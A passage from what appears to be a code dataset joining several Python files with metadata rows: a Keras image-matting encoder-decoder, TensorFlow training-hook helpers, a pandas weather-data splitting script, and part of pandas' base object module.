x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(128, (3, 3), activation='relu', padding='same', name='deconv3_3',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_2)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_2)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv2_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = UpSampling2D(size=(2, 2))(x)
the_shape = K.int_shape(orig_1)
shape = (1, the_shape[1], the_shape[2], the_shape[3])
origReshaped = Reshape(shape)(orig_1)
xReshaped = Reshape(shape)(x)
together = Concatenate(axis=1)([origReshaped, xReshaped])
x = Unpooling()(together)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_1',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', name='deconv1_2',
kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
def build_refinement(encoder_decoder):
input_tensor = encoder_decoder.input
input = Lambda(lambda i: i[:, :, :, 0:3])(input_tensor)
x = Concatenate(axis=3)([input, encoder_decoder.output])
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(64, (3, 3), activation='relu', padding='same', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
x = BatchNormalization()(x)
x = Conv2D(1, (3, 3), activation='sigmoid', padding='same', name='refinement_pred', kernel_initializer='he_normal',
bias_initializer='zeros')(x)
model = Model(inputs=input_tensor, outputs=x)
return model
if __name__ == '__main__':
with tf.device("/cpu:0"):
encoder_decoder = build_encoder_decoder()
print(encoder_decoder.summary())
plot_model(encoder_decoder, to_file='encoder_decoder.svg', show_layer_names=True, show_shapes=True)
with tf.device("/cpu:0"):
refinement = build_refinement(encoder_decoder)
print(refinement.summary())
plot_model(refinement, to_file='refinement.svg', show_layer_names=True, show_shapes=True)
parallel_model = multi_gpu_model(refinement, gpus=None)
print(parallel_model.summary())
plot_model(parallel_model, to_file='parallel_model.svg', show_layer_names=True, show_shapes=True)
K.clear_session()
| 44.736585 | 141 | 0.637771 | [
"MIT"
] | vietnamican/Deep-Image-Matting | segnet_v7.py | 9,171 | Python |
# This code is adapted from the https://github.com/tensorflow/models/tree/master/official/r1/resnet.
# ==========================================================================================
# NAVER’s modifications are Copyright 2020 NAVER corp. All rights reserved.
# ==========================================================================================
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Hooks helper to return a list of TensorFlow hooks for training by name.
More hooks can be added to this set. To add a new hook, 1) add the new hook to
the registry in HOOKS, 2) add a corresponding function that parses out necessary
parameters.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf # pylint: disable=g-bad-import-order
from official.utils.logs import hooks
from official.utils.logs import logger
from official.utils.logs import metric_hook
_TENSORS_TO_LOG = dict((x, x) for x in ['learning_rate',
'cross_entropy',
'train_ece',
'train_accuracy'])
def get_train_hooks(name_list, use_tpu=False, **kwargs):
"""Factory for getting a list of TensorFlow hooks for training by name.
Args:
name_list: a list of strings to name desired hook classes. Allowed:
LoggingTensorHook, ProfilerHook, ExamplesPerSecondHook, which are defined
as keys in HOOKS
use_tpu: Boolean of whether computation occurs on a TPU. This will disable
hooks altogether.
**kwargs: a dictionary of arguments to the hooks.
Returns:
list of instantiated hooks, ready to be used in a classifier.train call.
Raises:
ValueError: if an unrecognized name is passed.
"""
if not name_list:
return []
if use_tpu:
tf.logging.warning("hooks_helper received name_list `{}`, but a TPU is "
"specified. No hooks will be used.".format(name_list))
return []
train_hooks = []
for name in name_list:
hook_name = HOOKS.get(name.strip().lower())
if hook_name is None:
raise ValueError('Unrecognized training hook requested: {}'.format(name))
else:
train_hooks.append(hook_name(**kwargs))
return train_hooks
def get_logging_tensor_hook(every_n_iter=100, tensors_to_log=None, **kwargs): # pylint: disable=unused-argument
"""Function to get LoggingTensorHook.
Args:
every_n_iter: `int`, print the values of `tensors` once every N local
steps taken on the current worker.
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
**kwargs: a dictionary of arguments to LoggingTensorHook.
Returns:
Returns a LoggingTensorHook with a standard set of tensors that will be
printed to stdout.
"""
if tensors_to_log is None:
tensors_to_log = _TENSORS_TO_LOG
return tf.train.LoggingTensorHook(
tensors=tensors_to_log,
every_n_iter=every_n_iter)
def get_profiler_hook(model_dir, save_steps=1000, **kwargs): # pylint: disable=unused-argument
"""Function to get ProfilerHook.
Args:
model_dir: The directory to save the profile traces to.
save_steps: `int`, print profile traces every N steps.
**kwargs: a dictionary of arguments to ProfilerHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
"""
return tf.train.ProfilerHook(save_steps=save_steps, output_dir=model_dir)
def get_examples_per_second_hook(every_n_steps=100,
batch_size=128,
warm_steps=5,
**kwargs): # pylint: disable=unused-argument
"""Function to get ExamplesPerSecondHook.
Args:
every_n_steps: `int`, print current and average examples per second every
N steps.
batch_size: `int`, total batch size used to calculate examples/second from
global time.
warm_steps: skip this number of steps before logging and running average.
**kwargs: a dictionary of arguments to ExamplesPerSecondHook.
Returns:
Returns a ProfilerHook that writes out timelines that can be loaded into
profiling tools like chrome://tracing.
"""
return hooks.ExamplesPerSecondHook(
batch_size=batch_size, every_n_steps=every_n_steps,
warm_steps=warm_steps, metric_logger=logger.get_benchmark_logger())
def get_logging_metric_hook(tensors_to_log=None,
every_n_secs=600,
**kwargs): # pylint: disable=unused-argument
"""Function to get LoggingMetricHook.
Args:
tensors_to_log: List of tensor names or dictionary mapping labels to tensor
names. If not set, log _TENSORS_TO_LOG by default.
every_n_secs: `int`, the frequency for logging the metric. Default to every
10 mins.
Returns:
Returns a LoggingMetricHook that saves tensor values in a JSON format.
"""
if tensors_to_log is None:
tensors_to_log = _TENSORS_TO_LOG
return metric_hook.LoggingMetricHook(
tensors=tensors_to_log,
metric_logger=logger.get_benchmark_logger(),
every_n_secs=every_n_secs)
# A dictionary to map one hook name and its corresponding function
HOOKS = {
'loggingtensorhook': get_logging_tensor_hook,
'profilerhook': get_profiler_hook,
'examplespersecondhook': get_examples_per_second_hook,
'loggingmetrichook': get_logging_metric_hook,
}
| 36.786982 | 112 | 0.681518 | [
"Apache-2.0"
] | Mithilesh1609/assembled-cnn | official/utils/logs/hooks_helper.py | 6,219 | Python |
import pandas as pd
from datetime import datetime
import os
def datelist(beginDate, endDate):
date_l=[datetime.strftime(x,'%Y-%m-%d') for x in list(pd.date_range(start=beginDate, end=endDate))]
return date_l
begin_date='2018-10-28'
end_date='2018-11-03'
dates=datelist(begin_date,end_date)
if not os.path.exists('obs'):
os.mkdir('obs')
if not os.path.exists('fore'):
os.mkdir('fore')
if __name__=='__main__':
for date in dates:
obs_and_M_filepath = 'obs_and_M/' + date + '.csv'
obs_and_M = pd.read_csv(obs_and_M_filepath)
print(obs_and_M.info())
for col in obs_and_M.columns:
obs_and_M[col] = obs_and_M[col].fillna(-9999)
obs_and_M.round(3)
obs_and_M['FORE_data'] = ' ' + obs_and_M['FORE_data']
obs = pd.DataFrame(obs_and_M, columns=['FORE_data', 't2m_obs', 'rh2m_obs', 'w10m_obs'])
obs.columns = [' OBS_data', ' t2m', ' rh2m', ' w10m']
obs.to_csv('obs/' + date + '_1_obs.csv', index=False, float_format='%.03f')
M = pd.DataFrame(obs_and_M, columns=['FORE_data', 't2m_M', 'rh2m_M', 'w10m_M'])
M.columns = ['FORE_data', ' t2m', ' rh2m', ' w10m']
M.to_csv('fore/' + date + '_1_M.csv', index=False, float_format='%.03f')
| 38.909091 | 103 | 0.613707 | [
"MIT"
] | fengyang95/AIC_Weather_Forecasting | eval/obs_and_M_split.py | 1,284 | Python |
"""
Base and utility classes for pandas objects.
"""
from __future__ import annotations
import textwrap
from typing import (
TYPE_CHECKING,
Any,
Generic,
Hashable,
Literal,
TypeVar,
cast,
final,
)
import numpy as np
import pandas._libs.lib as lib
from pandas._typing import (
ArrayLike,
DtypeObj,
FrameOrSeries,
IndexLabel,
Shape,
npt,
)
from pandas.compat import PYPY
from pandas.compat.numpy import function as nv
from pandas.errors import AbstractMethodError
from pandas.util._decorators import (
cache_readonly,
doc,
)
from pandas.core.dtypes.common import (
is_categorical_dtype,
is_dict_like,
is_extension_array_dtype,
is_object_dtype,
is_scalar,
)
from pandas.core.dtypes.generic import (
ABCDataFrame,
ABCIndex,
ABCSeries,
)
from pandas.core.dtypes.missing import (
isna,
remove_na_arraylike,
)
from pandas.core import (
algorithms,
ops,
)
from pandas.core.accessor import DirNamesMixin
from pandas.core.algorithms import (
duplicated,
unique1d,
value_counts,
)
from pandas.core.arraylike import OpsMixin
from pandas.core.arrays import ExtensionArray
from pandas.core.construction import (
create_series_with_explicit_dtype,
ensure_wrapped_if_datetimelike,
extract_array,
)
import pandas.core.nanops as nanops
if TYPE_CHECKING:
from pandas._typing import (
NumpySorter,
NumpyValueArrayLike,
)
from pandas import Categorical
_shared_docs: dict[str, str] = {}
_indexops_doc_kwargs = {
"klass": "IndexOpsMixin",
"inplace": "",
"unique": "IndexOpsMixin",
"duplicated": "IndexOpsMixin",
}
_T = TypeVar("_T", bound="IndexOpsMixin")
class PandasObject(DirNamesMixin):
"""
Baseclass for various pandas objects.
"""
# results from calls to methods decorated with cache_readonly get added to _cache
_cache: dict[str, Any]
@property
def _constructor(self):
"""
Class constructor (for this class it's just `__class__`.
"""
return type(self)
def __repr__(self) -> str:
"""
Return a string representation for a particular object.
"""
# Should be overwritten by base classes
return object.__repr__(self)
def _reset_cache(self, key: str | None = None) -> None:
"""
Reset cached properties. If ``key`` is passed, only clears that key.
"""
if not hasattr(self, "_cache"):
return
if key is None:
self._cache.clear()
else:
self._cache.pop(key, None)
def __sizeof__(self) -> int:
"""
Generates the total memory usage for an object that returns
either a value or Series of values
"""
memory_usage = getattr(self, "memory_usage", None)
if memory_usage:
mem = memory_usage(deep=True)
return int(mem if is_scalar(mem) else mem.sum())
# no memory_usage attribute, so fall back to object's 'sizeof'
return super().__sizeof__()
class NoNewAttributesMixin:
"""
Mixin which prevents adding new attributes.
Prevents additional attributes via xxx.attribute = "something" after a
call to `self.__freeze()`. Mainly used to prevent the user from using
wrong attributes on an accessor (`Series.cat/.str/.dt`).
If you really want to add a new attribute at a later time, you need to use
`object.__setattr__(self, key, value)`.
"""
def _freeze(self):
"""
Prevents setting additional attributes.
"""
object.__setattr__(self, "__frozen", True)
# prevent adding any attribute via s.xxx.new_attribute = ...
def __setattr__(self, key: str, value):
# _cache is used by a decorator
# We need to check both 1.) cls.__dict__ and 2.) getattr(self, key)
# because
# 1.) getattr is false for attributes that raise errors
# 2.) cls.__dict__ doesn't traverse into base classes
if getattr(self, "__frozen", False) and not (
key == "_cache"
or key in type(self).__dict__
or getattr(self, key, None) is not None
):
raise AttributeError(f"You cannot add any new attribute '{key}'")
object.__setattr__(self, key, value)
class DataError(Exception):
pass
class SpecificationError(Exception):
pass
class SelectionMixin(Generic[FrameOrSeries]):
"""
mixin implementing the selection & aggregation interface on a group-like
object sub-classes need to define: obj, exclusions
"""
obj: FrameOrSeries
_selection: IndexLabel | None = None
exclusions: frozenset[Hashable]
_internal_names = ["_cache", "__setstate__"]
_internal_names_set = set(_internal_names)
@final
@property
def _selection_list(self):
if not isinstance(
self._selection, (list, tuple, ABCSeries, ABCIndex, np.ndarray)
):
return [self._selection]
return self._selection
@cache_readonly
def _selected_obj(self):
if self._selection is None or isinstance(self.obj, ABCSeries):
return self.obj
else:
return self.obj[self._selection]
@final
@cache_readonly
def ndim(self) -> int:
return self._selected_obj.ndim
@final
@cache_readonly
def _obj_with_exclusions(self):
if self._selection is not None and isinstance(self.obj, ABCDataFrame):
return self.obj[self._selection_list]
if len(self.exclusions) > 0:
# equivalent to `self.obj.drop(self.exclusions, axis=1)
# but this avoids consolidating and making a copy
return self.obj._drop_axis(
self.exclusions, axis=1, consolidate=False, only_slice=True
)
else:
return self.obj
def __getitem__(self, key):
if self._selection is not None:
raise IndexError(f"Column(s) {self._selection} already selected")
if isinstance(key, (list, tuple, ABCSeries, ABCIndex, np.ndarray)):
if len(self.obj.columns.intersection(key)) != len(key):
bad_keys = list(set(key).difference(self.obj.columns))
raise KeyError(f"Columns not found: {str(bad_keys)[1:-1]}")
return self._gotitem(list(key), ndim=2)
elif not getattr(self, "as_index", False):
if key not in self.obj.columns:
raise KeyError(f"Column not found: {key}")
return self._gotitem(key, ndim=2)
else:
if key not in self.obj:
raise KeyError(f"Column not found: {key}")
subset = self.obj[key]
ndim = subset.ndim
return self._gotitem(key, ndim=ndim, subset=subset)
def _gotitem(self, key, ndim: int, subset=None):
"""
sub-classes to define
return a sliced object
Parameters
----------
key : str / list of selections
ndim : {1, 2}
requested ndim of result
subset : object, default None
subset to act on
"""
raise AbstractMethodError(self)
def aggregate(self, func, *args, **kwargs):
raise AbstractMethodError(self)
agg = aggregate
class IndexOpsMixin(OpsMixin):
"""
Common ops mixin to support a unified interface / docs for Series / Index
"""
# ndarray compatibility
__array_priority__ = 1000
_hidden_attrs: frozenset[str] = frozenset(
["tolist"] # tolist is not deprecated, just suppressed in the __dir__
)
@property
def dtype(self) -> DtypeObj:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
@property
def _values(self) -> ExtensionArray | np.ndarray:
# must be defined here as a property for mypy
raise AbstractMethodError(self)
def transpose(self: _T, *args, **kwargs) -> _T:
"""
Return the transpose, which is by definition self.
Returns
-------
%(klass)s
"""
nv.validate_transpose(args, kwargs)
return self
T = property(
transpose,
doc="""
Return the transpose, which is by definition self.
""",
)
@property
def shape(self) -> Shape:
"""
Return a tuple of the shape of the underlying data.
"""
return self._values.shape
def __len__(self) -> int:
# We need this defined here for mypy
raise AbstractMethodError(self)
@property
def ndim(self) -> int:
"""
Number of dimensions of the underlying data, by definition 1.
"""
return 1
def item(self):
"""
Return the first element of the underlying data as a Python scalar.
Returns
-------
scalar
The first element of %(klass)s.
Raises
------
ValueError
If the data is not length-1.
"""
if len(self) == 1:
return next(iter(self))
raise ValueError("can only convert an array of size 1 to a Python scalar")
@property
def nbytes(self) -> int:
"""
Return the number of bytes in the underlying data.
"""
return self._values.nbytes
@property
def size(self) -> int:
"""
Return the number of elements in the underlying data.
"""
return len(self._values)
@property
def array(self) -> ExtensionArray:
"""
The ExtensionArray of the data backing this Series or Index.
Returns
-------
ExtensionArray
An ExtensionArray of the values stored within. For extension
types, this is the actual array. For NumPy native types, this
is a thin (no copy) wrapper around :class:`numpy.ndarray`.
``.array`` differs ``.values`` which may require converting the
data to a different form.
See Also
--------
Index.to_numpy : Similar method that always returns a NumPy array.
Series.to_numpy : Similar method that always returns a NumPy array.
Notes
-----
This table lays out the different array types for each extension
dtype within pandas.
================== =============================
dtype array type
================== =============================
category Categorical
period PeriodArray
interval IntervalArray
IntegerNA IntegerArray
string StringArray
boolean BooleanArray
datetime64[ns, tz] DatetimeArray
================== =============================
For any 3rd-party extension types, the array type will be an
ExtensionArray.
For all remaining dtypes ``.array`` will be a
:class:`arrays.NumpyExtensionArray` wrapping the actual ndarray
stored within. If you absolutely need a NumPy array (possibly with
copying / coercing data), then use :meth:`Series.to_numpy` instead.
Examples
--------
For regular NumPy types like int, and float, a PandasArray
is returned.
>>> pd.Series([1, 2, 3]).array
<PandasArray>
[1, 2, 3]
Length: 3, dtype: int64
For extension types, like Categorical, the actual ExtensionArray
is returned
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.array
['a', 'b', 'a']
Categories (2, object): ['a', 'b']
"""
raise AbstractMethodError(self)
def to_numpy(
self,
dtype: npt.DTypeLike | None = None,
copy: bool = False,
na_value=lib.no_default,
**kwargs,
) -> np.ndarray:
"""
A NumPy ndarray representing the values in this Series or Index.
Parameters
----------
dtype : str or numpy.dtype, optional
The dtype to pass to :meth:`numpy.asarray`.
copy : bool, default False
Whether to ensure that the returned value is not a view on
another array. Note that ``copy=False`` does not *ensure* that
``to_numpy()`` is no-copy. Rather, ``copy=True`` ensure that
a copy is made, even if not strictly necessary.
na_value : Any, optional
The value to use for missing values. The default value depends
on `dtype` and the type of the array.
.. versionadded:: 1.0.0
**kwargs
Additional keywords passed through to the ``to_numpy`` method
of the underlying array (for extension arrays).
.. versionadded:: 1.0.0
Returns
-------
numpy.ndarray
See Also
--------
Series.array : Get the actual data stored within.
Index.array : Get the actual data stored within.
DataFrame.to_numpy : Similar method for DataFrame.
Notes
-----
The returned array will be the same up to equality (values equal
in `self` will be equal in the returned array; likewise for values
that are not equal). When `self` contains an ExtensionArray, the
dtype may be different. For example, for a category-dtype Series,
``to_numpy()`` will return a NumPy array and the categorical dtype
will be lost.
For NumPy dtypes, this will be a reference to the actual data stored
in this Series or Index (assuming ``copy=False``). Modifying the result
in place will modify the data stored in the Series or Index (not that
we recommend doing that).
For extension types, ``to_numpy()`` *may* require copying data and
coercing the result to a NumPy type (possibly object), which may be
expensive. When you need a no-copy reference to the underlying data,
:attr:`Series.array` should be used instead.
This table lays out the different dtypes and default return types of
``to_numpy()`` for various dtypes within pandas.
================== ================================
dtype array type
================== ================================
category[T] ndarray[T] (same dtype as input)
period ndarray[object] (Periods)
interval ndarray[object] (Intervals)
IntegerNA ndarray[object]
datetime64[ns] datetime64[ns]
datetime64[ns, tz] ndarray[object] (Timestamps)
================== ================================
Examples
--------
>>> ser = pd.Series(pd.Categorical(['a', 'b', 'a']))
>>> ser.to_numpy()
array(['a', 'b', 'a'], dtype=object)
Specify the `dtype` to control how datetime-aware data is represented.
Use ``dtype=object`` to return an ndarray of pandas :class:`Timestamp`
objects, each with the correct ``tz``.
>>> ser = pd.Series(pd.date_range('2000', periods=2, tz="CET"))
>>> ser.to_numpy(dtype=object)
array([Timestamp('2000-01-01 00:00:00+0100', tz='CET'),
Timestamp('2000-01-02 00:00:00+0100', tz='CET')],
dtype=object)
Or ``dtype='datetime64[ns]'`` to return an ndarray of native
datetime64 values. The values are converted to UTC and the timezone
info is dropped.
>>> ser.to_numpy(dtype="datetime64[ns]")
... # doctest: +ELLIPSIS
array(['1999-12-31T23:00:00.000000000', '2000-01-01T23:00:00...'],
dtype='datetime64[ns]')
"""
if is_extension_array_dtype(self.dtype):
# error: Too many arguments for "to_numpy" of "ExtensionArray"
return self.array.to_numpy( # type: ignore[call-arg]
dtype, copy=copy, na_value=na_value, **kwargs
)
elif kwargs:
bad_keys = list(kwargs.keys())[0]
raise TypeError(
f"to_numpy() got an unexpected keyword argument '{bad_keys}'"
)
result = np.asarray(self._values, dtype=dtype)
# TODO(GH-24345): Avoid potential double copy
if copy or na_value is not lib.no_default:
result = result.copy()
if na_value is not lib.no_default:
result[self.isna()] = na_value
return result
@property
def empty(self) -> bool:
return not self.size
def max(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the maximum value of the Index.
Parameters
----------
axis : int, optional
For compatibility with NumPy. Only 0 or None are allowed.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Maximum value.
See Also
--------
Index.min : Return the minimum value in an Index.
Series.max : Return the maximum value in a Series.
DataFrame.max : Return the maximum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.max()
3
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.max()
'c'
For a MultiIndex, the maximum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.max()
('b', 2)
"""
nv.validate_minmax_axis(axis)
nv.validate_max(args, kwargs)
return nanops.nanmax(self._values, skipna=skipna)
@doc(op="max", oppose="min", value="largest")
def argmax(self, axis=None, skipna: bool = True, *args, **kwargs) -> int:
"""
Return int position of the {value} value in the Series.
If the {op}imum is achieved in multiple locations,
the first row position is returned.
Parameters
----------
axis : {{None}}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
int
Row position of the {op}imum value.
See Also
--------
Series.arg{op} : Return position of the {op}imum value.
Series.arg{oppose} : Return position of the {oppose}imum value.
numpy.ndarray.arg{op} : Equivalent method for numpy arrays.
Series.idxmax : Return index label of the maximum values.
Series.idxmin : Return index label of the minimum values.
Examples
--------
Consider dataset containing cereal calories
>>> s = pd.Series({{'Corn Flakes': 100.0, 'Almond Delight': 110.0,
... 'Cinnamon Toast Crunch': 120.0, 'Cocoa Puff': 110.0}})
>>> s
Corn Flakes 100.0
Almond Delight 110.0
Cinnamon Toast Crunch 120.0
Cocoa Puff 110.0
dtype: float64
>>> s.argmax()
2
>>> s.argmin()
0
The maximum cereal calories is the third element and
the minimum cereal calories is the first element,
since series is zero-indexed.
"""
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmax_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmax()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmax( # type: ignore[return-value]
delegate, skipna=skipna
)
def min(self, axis=None, skipna: bool = True, *args, **kwargs):
"""
Return the minimum value of the Index.
Parameters
----------
axis : {None}
Dummy argument for consistency with Series.
skipna : bool, default True
Exclude NA/null values when showing the result.
*args, **kwargs
Additional arguments and keywords for compatibility with NumPy.
Returns
-------
scalar
Minimum value.
See Also
--------
Index.max : Return the maximum value of the object.
Series.min : Return the minimum value in a Series.
DataFrame.min : Return the minimum values in a DataFrame.
Examples
--------
>>> idx = pd.Index([3, 2, 1])
>>> idx.min()
1
>>> idx = pd.Index(['c', 'b', 'a'])
>>> idx.min()
'a'
For a MultiIndex, the minimum is determined lexicographically.
>>> idx = pd.MultiIndex.from_product([('a', 'b'), (2, 1)])
>>> idx.min()
('a', 1)
"""
nv.validate_minmax_axis(axis)
nv.validate_min(args, kwargs)
return nanops.nanmin(self._values, skipna=skipna)
@doc(argmax, op="min", oppose="max", value="smallest")
def argmin(self, axis=None, skipna=True, *args, **kwargs) -> int:
delegate = self._values
nv.validate_minmax_axis(axis)
skipna = nv.validate_argmin_with_skipna(skipna, args, kwargs)
if isinstance(delegate, ExtensionArray):
if not skipna and delegate.isna().any():
return -1
else:
return delegate.argmin()
else:
# error: Incompatible return value type (got "Union[int, ndarray]", expected
# "int")
return nanops.nanargmin( # type: ignore[return-value]
delegate, skipna=skipna
)
def tolist(self):
"""
Return a list of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
list
See Also
--------
numpy.ndarray.tolist : Return the array as an a.ndim-levels deep
nested list of Python scalars.
"""
if not isinstance(self._values, np.ndarray):
# check for ndarray instead of dtype to catch DTA/TDA
return list(self._values)
return self._values.tolist()
to_list = tolist
def __iter__(self):
"""
Return an iterator of the values.
These are each a scalar type, which is a Python scalar
(for str, int, float) or a pandas scalar
(for Timestamp/Timedelta/Interval/Period)
Returns
-------
iterator
"""
# We are explicitly making element iterators.
if not isinstance(self._values, np.ndarray):
# Check type instead of dtype to catch DTA/TDA
return iter(self._values)
else:
return map(self._values.item, range(self._values.size))
@cache_readonly
def hasnans(self) -> bool:
"""
Return if I have any nans; enables various perf speedups.
"""
return bool(isna(self).any())
def isna(self):
return isna(self._values)
def _reduce(
self,
op,
name: str,
*,
axis=0,
skipna=True,
numeric_only=None,
filter_type=None,
**kwds,
):
"""
Perform the reduction type operation if we can.
"""
func = getattr(self, name, None)
if func is None:
raise TypeError(
f"{type(self).__name__} cannot perform the operation {name}"
)
return func(skipna=skipna, **kwds)
@final
def _map_values(self, mapper, na_action=None):
"""
An internal function that maps values using the input
correspondence (which can be a dict, Series, or function).
Parameters
----------
mapper : function, dict, or Series
The input correspondence object
na_action : {None, 'ignore'}
If 'ignore', propagate NA values, without passing them to the
mapping function
Returns
-------
Union[Index, MultiIndex], inferred
The output of the mapping function applied to the index.
If the function returns a tuple with more than one element
a MultiIndex will be returned.
"""
# we can fastpath dict/Series to an efficient map
# as we know that we are not going to have to yield
# python types
if is_dict_like(mapper):
if isinstance(mapper, dict) and hasattr(mapper, "__missing__"):
# If a dictionary subclass defines a default value method,
# convert mapper to a lookup function (GH #15999).
dict_with_default = mapper
mapper = lambda x: dict_with_default[x]
else:
# Dictionary does not have a default. Thus it's safe to
# convert to an Series for efficiency.
# we specify the keys here to handle the
# possibility that they are tuples
# The return value of mapping with an empty mapper is
# expected to be pd.Series(np.nan, ...). As np.nan is
# of dtype float64 the return value of this method should
# be float64 as well
mapper = create_series_with_explicit_dtype(
mapper, dtype_if_empty=np.float64
)
if isinstance(mapper, ABCSeries):
# Since values were input this means we came from either
# a dict or a series and mapper should be an index
if is_categorical_dtype(self.dtype):
# use the built in categorical series mapper which saves
# time by mapping the categories instead of all values
cat = cast("Categorical", self._values)
return cat.map(mapper)
values = self._values
indexer = mapper.index.get_indexer(values)
new_values = algorithms.take_nd(mapper._values, indexer)
return new_values
# we must convert to python types
if is_extension_array_dtype(self.dtype) and hasattr(self._values, "map"):
# GH#23179 some EAs do not have `map`
values = self._values
if na_action is not None:
raise NotImplementedError
map_f = lambda values, f: values.map(f)
else:
values = self._values.astype(object)
if na_action == "ignore":
map_f = lambda values, f: lib.map_infer_mask(
values, f, isna(values).view(np.uint8)
)
elif na_action is None:
map_f = lib.map_infer
else:
msg = (
"na_action must either be 'ignore' or None, "
f"{na_action} was passed"
)
raise ValueError(msg)
# mapper is a function
new_values = map_f(values, mapper)
return new_values
def value_counts(
self,
normalize: bool = False,
sort: bool = True,
ascending: bool = False,
bins=None,
dropna: bool = True,
):
"""
Return a Series containing counts of unique values.
The resulting object will be in descending order so that the
first element is the most frequently-occurring element.
Excludes NA values by default.
Parameters
----------
normalize : bool, default False
If True then the object returned will contain the relative
frequencies of the unique values.
sort : bool, default True
Sort by frequencies.
ascending : bool, default False
Sort in ascending order.
bins : int, optional
Rather than count values, group them into half-open bins,
a convenience for ``pd.cut``, only works with numeric data.
dropna : bool, default True
Don't include counts of NaN.
Returns
-------
Series
See Also
--------
Series.count: Number of non-NA elements in a Series.
DataFrame.count: Number of non-NA elements in a DataFrame.
DataFrame.value_counts: Equivalent method on DataFrames.
Examples
--------
>>> index = pd.Index([3, 1, 2, 3, 4, np.nan])
>>> index.value_counts()
3.0 2
1.0 1
2.0 1
4.0 1
dtype: int64
With `normalize` set to `True`, returns the relative frequency by
dividing all values by the sum of values.
>>> s = pd.Series([3, 1, 2, 3, 4, np.nan])
>>> s.value_counts(normalize=True)
3.0 0.4
1.0 0.2
2.0 0.2
4.0 0.2
dtype: float64
**bins**
Bins can be useful for going from a continuous variable to a
categorical variable; instead of counting unique
apparitions of values, divide the index in the specified
number of half-open bins.
>>> s.value_counts(bins=3)
(0.996, 2.0] 2
(2.0, 3.0] 2
(3.0, 4.0] 1
dtype: int64
**dropna**
With `dropna` set to `False` we can also see NaN index values.
>>> s.value_counts(dropna=False)
3.0 2
1.0 1
2.0 1
4.0 1
NaN 1
dtype: int64
"""
return value_counts(
self,
sort=sort,
ascending=ascending,
normalize=normalize,
bins=bins,
dropna=dropna,
)
def unique(self):
values = self._values
if not isinstance(values, np.ndarray):
result: ArrayLike = values.unique()
if self.dtype.kind in ["m", "M"] and isinstance(self, ABCSeries):
# GH#31182 Series._values returns EA, unpack for backward-compat
if getattr(self.dtype, "tz", None) is None:
result = np.asarray(result)
else:
result = unique1d(values)
return result
def nunique(self, dropna: bool = True) -> int:
"""
Return number of unique elements in the object.
Excludes NA values by default.
Parameters
----------
dropna : bool, default True
Don't include NaN in the count.
Returns
-------
int
See Also
--------
DataFrame.nunique: Method nunique for DataFrame.
Series.count: Count non-NA/null observations in the Series.
Examples
--------
>>> s = pd.Series([1, 3, 5, 7, 7])
>>> s
0 1
1 3
2 5
3 7
4 7
dtype: int64
>>> s.nunique()
4
"""
uniqs = self.unique()
if dropna:
uniqs = remove_na_arraylike(uniqs)
return len(uniqs)
@property
def is_unique(self) -> bool:
"""
Return boolean if values in the object are unique.
Returns
-------
bool
"""
return self.nunique(dropna=False) == len(self)
@property
def is_monotonic(self) -> bool:
"""
